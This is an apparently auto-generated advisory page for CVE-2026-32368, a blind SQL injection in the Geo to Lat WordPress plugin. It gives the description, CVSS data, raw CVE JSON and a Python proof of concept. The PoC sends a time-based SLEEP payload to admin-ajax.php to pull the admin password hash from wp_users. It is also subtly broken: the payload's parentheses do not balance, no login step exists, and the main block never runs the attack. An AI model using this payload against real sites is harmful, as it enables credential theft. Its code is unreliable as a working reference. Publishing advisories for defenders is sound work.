Security Vulnerability Report
中文
CVE-2026-32368 CVSS 8.5 HIGH

CVE-2026-32368

Published: 2026-03-13 19:54:51
Last Modified: 2026-04-22 21:30:26

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in delphiknight Geo to Lat geo-to-lat allows Blind SQL Injection.This issue affects Geo to Lat: from n/a through <= 1.0.19.

CVSS Details

CVSS Score
8.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Geo to Lat Plugin <= 1.0.19

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2026-32368 Geo to Lat Blind SQL Injection PoC # Target: WordPress site with Geo to Lat plugin <= 1.0.19 TARGET_URL = "http://target-site.com/wp-admin/admin-ajax.php" WORDPRESS_USER = "attacker" WORDPRESS_PASS = "password123" def get_wordpress_nonce(cookie): """Fetch CSRF token from Geo to Lat admin page""" resp = requests.get( f"{TARGET_URL.replace('/admin-ajax.php', '')}/wp-admin/admin.php?page=geo-to-lat", cookies=cookie ) import re nonce_match = re.search(r'data-nonce="([a-f0-9]+)"', resp.text) return nonce_match.group(1) if nonce_match else None def blind_sql_injection_test(cookie, nonce): """Test blind SQL injection with time-based technique""" # Payload: Extract admin user password hash (first 5 chars) # Using CASE WHEN with SUBSTRING to extract password hash payload = "1' AND (SELECT CASE WHEN (SUBSTRING(user_pass,1,5)='PREFIX' THEN SLEEP(5) ELSE 0 END) FROM wp_users WHERE id=1-- -" data = { "action": "geo_to_lat_save_settings", "nonce": nonce, "geo_to_lat_data": payload } print(f"[*] Sending SQL injection payload...") print(f"[*] Payload: {payload}") try: resp = requests.post(TARGET_URL, data=data, cookies=cookie, timeout=10) print(f"[+] Response received") except requests.exceptions.Timeout: print(f"[!] Request timed out - SQL injection confirmed!") return True return False if __name__ == "__main__": print("[*] CVE-2026-32368 Geo to Lat SQL Injection Tester") print("[*] Requires low-privilege WordPress account")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32368", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:51.027", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in delphiknight Geo to Lat geo-to-lat allows Blind SQL Injection.This issue affects Geo to Lat: from n/a through <= 1.0.19."}, {"lang": "es", "value": "Neutralización Incorrecta de Elementos Especiales utilizados en un Comando SQL ('Inyección SQL') vulnerabilidad en delphiknight Geo to Lat geo-to-lat permite Inyección SQL Ciega. Este problema afecta a Geo to Lat: desde n/a hasta &lt;= 1.0.19."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/geo-to-lat/vulnerability/wordpress-geo-to-lat-plugin-1-0-19-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}